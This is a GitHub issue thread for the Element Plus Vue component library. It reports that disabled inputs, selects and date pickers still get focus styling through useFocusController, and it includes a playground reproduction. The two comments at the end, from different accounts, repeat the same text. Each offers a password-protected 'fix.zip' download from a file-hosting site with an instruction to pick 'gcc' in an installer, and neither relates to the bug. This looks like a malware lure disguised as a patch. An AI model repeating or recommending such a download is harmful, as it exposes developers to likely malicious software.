### ISSUE TITLE
[Performance] Triggered focus (style) in `useFocusController` while disabled

### ISSUE THREAD

**Issue by HaceraI** [element-plus/element-plus#18005]
Bug Type: **`Performance`**

## Environment

- Vue Version: `3.4.38`
- Element Plus Version: `2.8.1`
- Browser / OS: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36`
- Build Tool: `Vite`

### Related Component

- `el-input`
- `el-select`
- `el-select-v2`
- `el-date-picker`
- `el-mention`

### Reproduction Link

[Element Plus Playground](https://element-plus.run/#eyJBcHAudnVlIjoiPHRlbXBsYXRlPlxuICA8ZGl2IGNsYXNzPVwid3JhcHBlclwiPlxuICAgIDxkaXYgY2xhc3M9XCJpdGVtIGVsLWlcIj5cbiAgICAgIDxwPmNsaWNrIPCfkYc8L3A+XG4gICAgICA8ZWwtaW5wdXQgZGlzYWJsZWQgLz5cbiAgICAgIDxwPmNsYXNzZXM6IHt7IGNsYXNzZXMxIH19PC9wPlxuICAgIDwvZGl2PlxuXG4gICAgPGRpdiBjbGFzcz1cIml0ZW0gZWwtc1wiPlxuICAgICAgPHA+bW91c2UgaW4vb3V0LCBjbGljayDwn5GHPC9wPlxuICAgICAgPGVsLXNlbGVjdCBkaXNhYmxlZCAvPlxuICAgICAgPHA+Y2xhc3Nlczoge3sgY2xhc3NlczIgfX08L3A+XG4gICAgPC9kaXY+XG5cbiAgICA8ZGl2IGNsYXNzPVwiaXRlbSBlbC1kcFwiPlxuICAgICAgPHA+Y2xpY2sg8J+RhzwvcD5cbiAgICAgIDxlbC1kYXRlLXBpY2tlciBkaXNhYmxlZCAvPlxuICAgICAgPHA+Y2xhc3Nlczoge3sgY2xhc3NlczMgfX08L3A+XG4gICAgPC9kaXY+XG5cbiAgICA8ZGl2IGNsYXNzPVwiaXRlbVwiPlxuICAgICAgPHA+b3RoZXIgY29tcG9uZW50cyB1c2luZyBgdXNlRm9jdXNDb250cm9sbGVyYC4uLjwvcD5cbiAgICAgIDxwPmBjb2xvci1waWNrZXJg44CBYG1lbnRpb25gLi4uPC9wPlxuICAgIDwvZGl2PlxuICA8L2Rpdj5cbjwvdGVtcGxhdGU+XG5cbjxzY3JpcHQgbGFuZz1cInRzXCIgc2V0dXA+XG5pbXBvcnQgeyB1c2VDbGFzc1dhdGNoZXIgfSBmcm9tICcuL3VzZUNsYXNzV2F0Y2hlcic7IFxuXG5jb25zdCB7IGNsYXNzZXM6IGNsYXNzZXMxIH0gPSB1c2VDbGFzc1dhdGNoZXIoJ2VsLWknKTtcbmNvbnN0IHsgY2xhc3NlczogY2xhc3NlczIgfSA9IHVzZUNsYXNzV2F0Y2hlcignZWwtcycpO1xuY29uc3QgeyBjbGFzc2VzOiBjbGFzc2VzMyB9ID0gdXNlQ2xhc3NXYXRjaGVyKCdlbC1kcCcpO1xuPC9zY3JpcHQ+XG48c3R5bGU+XG4ud3JhcHBlciB7XG4gIG1hcmdpbjogMTJweDtcbn1cbi5pdGVtIHtcbiAgYm9yZGVyOiAxcHggZ3JheSBzb2xpZDtcbiAgYm9yZGVyLXJhZGl1czogOHB4O1xuICBwYWRkaW5nOiAxOHB4O1xuICBtYXJnaW4tYmxvY2stZW5kOiAyNHB4O1xufVxuXG4uaXRlbSBwOmZpcnN0LW9mLXR5cGUge1xuICBtYXJnaW4tYmxvY2stc3RhcnQ6IC02cHg7XG4gIGZvbnQtd2VpZ2h0OiA2MDA7XG59XG48L3N0eWxlPiIsImVsZW1lbnQtcGx1cy5qcyI6ImltcG9ydCB7IGdldEN1cnJlbnRJbnN0YW5jZSB9IGZyb20gJ3Z1ZSdcbmltcG9ydCBFbGVtZW50UGx1cyBmcm9tICdlbGVtZW50LXBsdXMnXG5cbmxldCBpbnN0YWxsZWQgPSBmYWxzZVxuYXdhaXQgbG9hZFN0eWxlKClcblxuZXhwb3J0IGZ1bmN0aW9uIHNldHVwRWxlbWVudFBsdXMoKSB7XG4gIGlmIChpbnN0YWxsZWQpIHJldHVyblxuICBjb25zdCBpbnN0YW5jZSA9IGdldEN1cnJlbnRJbnN0YW5jZSgpXG4gIGluc3RhbmNlLmFwcENvbnRleHQuYXBwLnVzZShFbGVtZW50UGx1cylcbiAgaW5zdGFsbGVkID0gdHJ1ZVxufVxuXG5leHBvcnQgZnVuY3Rpb24gbG9hZFN0eWxlKCkge1xuICBjb25zdCBzdHlsZXMgPSBbJ2h0dHBzOi8vZmFzdGx5LmpzZGVsaXZyLm5ldC9ucG0vZWxlbWVudC1wbHVzQDIuOC4xL2Rpc3QvaW5kZXguY3NzJywgJ2h0dHBzOi8vZmFzdGx5LmpzZGVsaXZyLm5ldC9ucG0vZWxlbWVudC1wbHVzQDIuOC4xL3RoZW1lLWNoYWxrL2RhcmsvY3NzLXZhcnMuY3NzJ10ubWFwKChzdHlsZSkgPT4ge1xuICAgIHJldHVybiBuZXcgUHJvbWlzZSgocmVzb2x2ZSwgcmVqZWN0KSA9PiB7XG4gICAgICBjb25zdCBsaW5rID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbGluaycpXG4gICAgICBsaW5rLnJlbCA9ICdzdHlsZXNoZWV0J1xuICAgICAgbGluay5ocmVmID0gc3R5bGVcbiAgICAgIGxpbmsuYWRkRXZlbnRMaXN0ZW5lcignbG9hZCcsIHJlc29sdmUpXG4gICAgICBsaW5rLmFkZEV2ZW50TGlzdGVuZXIoJ2Vycm9yJywgcmVqZWN0KVxuICAgICAgZG9jdW1lbnQuYm9keS5hcHBlbmQobGluaylcbiAgICB9KVxuICB9KVxuICByZXR1cm4gUHJvbWlzZS5hbGxTZXR0bGVkKHN0eWxlcylcbn0iLCJ0c2NvbmZpZy5qc29uIjoie1xuICBcImNvbXBpbGVyT3B0aW9uc1wiOiB7XG4gICAgXCJ0YXJnZXRcIjogXCJFU05leHRcIixcbiAgICBcImpzeFwiOiBcInByZXNlcnZlXCIsXG4gICAgXCJtb2R1bGVcIjogXCJFU05leHRcIixcbiAgICBcIm1vZHVsZVJlc29sdXRpb25cIjogXCJCdW5kbGVyXCIsXG4gICAgXCJ0eXBlc1wiOiBbXCJlbGVtZW50LXBsdXMvZ2xvYmFsLmQudHNcIl0sXG4gICAgXCJhbGxvd0ltcG9ydGluZ1RzRXh0ZW5zaW9uc1wiOiB0cnVlLFxuICAgIFwiYWxsb3dKc1wiOiB0cnVlLFxuICAgIFwiY2hlY2tKc1wiOiB0cnVlXG4gIH0sXG4gIFwidnVlQ29tcGlsZXJPcHRpb25zXCI6IHtcbiAgICBcInRhcmdldFwiOiAzLjNcbiAgfVxufVxuIiwiUGxheWdyb3VuZE1haW4udnVlIjoiPHNjcmlwdCBzZXR1cD5cbmltcG9ydCBBcHAgZnJvbSAnLi9BcHAudnVlJ1xuaW1wb3J0IHsgc2V0dXBFbGVtZW50UGx1cyB9IGZyb20gJy4vZWxlbWVudC1wbHVzLmpzJ1xuc2V0dXBFbGVtZW50UGx1cygpXG48L3NjcmlwdD5cblxuPHRlbXBsYXRlPlxuICA8QXBwIC8+XG48L3RlbXBsYXRlPlxuIiwiaW1wb3J0LW1hcC5qc29uIjoie1xuICBcImltcG9ydHNcIjoge1xuICAgIFwidnVlXCI6IFwiaHR0cHM6Ly9mYXN0bHkuanNkZWxpdnIubmV0L25wbS9AdnVlL3J1bnRpbWUtZG9tQGxhdGVzdC9kaXN0L3J1bnRpbWUtZG9tLmVzbS1icm93c2VyLmpzXCIsXG4gICAgXCJAdnVlL3NoYXJlZFwiOiBcImh0dHBzOi8vZmFzdGx5LmpzZGVsaXZyLm5ldC9ucG0vQHZ1ZS9zaGFyZWRAbGF0ZXN0L2Rpc3Qvc2hhcmVkLmVzbS1idW5kbGVyLmpzXCIsXG4gICAgXCJlbGVtZW50LXBsdXNcIjogXCJodHRwczovL2Zhc3RseS5qc2RlbGl2ci5uZXQvbnBtL2VsZW1lbnQtcGx1c0AyLjguMS9kaXN0L2luZGV4LmZ1bGwubWluLm1qc1wiLFxuICAgIFwiZWxlbWVudC1wbHVzL1wiOiBcImh0dHBzOi8vZmFzdGx5LmpzZGVsaXZyLm5ldC9ucG0vZWxlbWVudC1wbHVzQDIuOC4xL1wiLFxuICAgIFwiQGVsZW1lbnQtcGx1cy9pY29ucy12dWVcIjogXCJodHRwczovL2Zhc3RseS5qc2RlbGl2ci5uZXQvbnBtL0BlbGVtZW50LXBsdXMvaWNvbnMtdnVlQDIvZGlzdC9pbmRleC5taW4uanNcIlxuICB9LFxuICBcInNjb3Blc1wiOiB7fVxufSIsInVzZUNsYXNzV2F0Y2hlci50cyI6Ii8vIHVzZUNsYXNzV2F0Y2hlci50c1xyXG5pbXBvcnQgeyByZWYsIG9uTW91bnRlZCwgb25CZWZvcmVVbm1vdW50IH0gZnJvbSAndnVlJztcclxuXHJcbmV4cG9ydCBmdW5jdGlvbiB1c2VDbGFzc1dhdGNoZXIodGFyZ2V0Q2xhc3M6IHN0cmluZykge1xyXG4gIGNvbnN0IGNsYXNzZXMgPSByZWY8c3RyaW5nW10+KFtdKTtcclxuICBsZXQgb2JzZXJ2ZXI6IE11dGF0aW9uT2JzZXJ2ZXIgfCBudWxsID0gbnVsbDtcclxuXHJcbiAgZnVuY3Rpb24gZ2V0Q2xhc3NlcyhjbHM6IHN0cmluZykge1xyXG4gICAgY29uc3QgZWxlbWVudCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoYC4ke2Nsc31gKTtcclxuICAgIGlmICghZWxlbWVudCkgcmV0dXJuIFtdO1xyXG5cclxuICAgIGNvbnN0IGNsYXNzU2V0ID0gbmV3IFNldDxzdHJpbmc+KCk7XHJcbiAgICBjb25zdCB3cmFwcGVyRWxlbWVudHMgPSBlbGVtZW50LnF1ZXJ5U2VsZWN0b3JBbGwoJypbY2xhc3MqPVwiX193cmFwcGVyXCJdJyk7XHJcbiAgICBcclxuICAgIHdyYXBwZXJFbGVtZW50cy5mb3JFYWNoKGVsID0+IHtcclxuICAgICAgZWwuY2xhc3NMaXN0LmZvckVhY2goY2xhc3NOYW1lID0+IHtcclxuICAgICAgICBjbGFzc1NldC5hZGQoY2xhc3NOYW1lKTtcclxuICAgICAgfSk7XHJcbiAgICB9KTtcclxuXHJcbiAgICByZXR1cm4gQXJyYXkuZnJvbShjbGFzc1NldCk7XHJcbiAgfVxyXG5cclxuICBmdW5jdGlvbiBoYW5kbGVDbGFzc0NoYW5nZSgpIHtcclxuICAgIGNsYXNzZXMudmFsdWUgPSBnZXRDbGFzc2VzKHRhcmdldENsYXNzKTtcclxuICB9XHJcblxyXG4gIG9uTW91bnRlZCgoKSA9PiB7XHJcbiAgICBjb25zdCB0YXJnZXRFbGVtZW50ID0gZG9jdW1lbnQucXVlcnlTZWxlY3RvcihgLiR7dGFyZ2V0Q2xhc3N9YCk7XHJcbiAgICBpZiAodGFyZ2V0RWxlbWVudCkge1xyXG4gICAgICBvYnNlcnZlciA9IG5ldyBNdXRhdGlvbk9ic2VydmVyKCgpID0+IHtcclxuICAgICAgICBoYW5kbGVDbGFzc0NoYW5nZSgpO1xyXG4gICAgICB9KTtcclxuXHJcbiAgICAgIG9ic2VydmVyLm9ic2VydmUodGFyZ2V0RWxlbWVudCwge1xyXG4gICAgICAgIGF0dHJpYnV0ZXM6IHRydWUsXHJcbiAgICAgICAgYXR0cmlidXRlRmlsdGVyOiBbJ2NsYXNzJ10sXHJcbiAgICAgICAgY2hpbGRMaXN0OiB0cnVlLFxyXG4gICAgICAgIHN1YnRyZWU6IHRydWUsIFxyXG4gICAgICB9KTtcclxuXHJcbiAgICAgIGhhbmRsZUNsYXNzQ2hhbmdlKCk7XHJcbiAgICB9XHJcbiAgfSk7XHJcblxyXG4gIG9uQmVmb3JlVW5tb3VudCgoKSA9PiB7XHJcbiAgICBpZiAob2JzZXJ2ZXIpIHtcclxuICAgICAgb2JzZXJ2ZXIuZGlzY29ubmVjdCgpO1xyXG4gICAgfVxyXG4gIH0pO1xyXG5cclxuICByZXR1cm4geyBjbGFzc2VzIH07XHJcbn1cclxuIiwiX28iOnt9fQ==)

### Steps to reproduce

Just check the playground and follow the prompts

### What is Expected?

In the disabled state, it no longer triggers focus

### What is actually happening?

The focus is triggered in the disabled state

### Additional comments
This problem does not exist after switching to version 2.7.8 or below

After checking the code, I found that the reason is that the focus and blur events are registered in `useFocusController`, and `wrapperRef` is bound to div, which actually triggers the focus and blur of div.

https://github.com/element-plus/element-plus/blob/dev/packages/hooks/use-focus-controller/index.ts#L73-L74

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
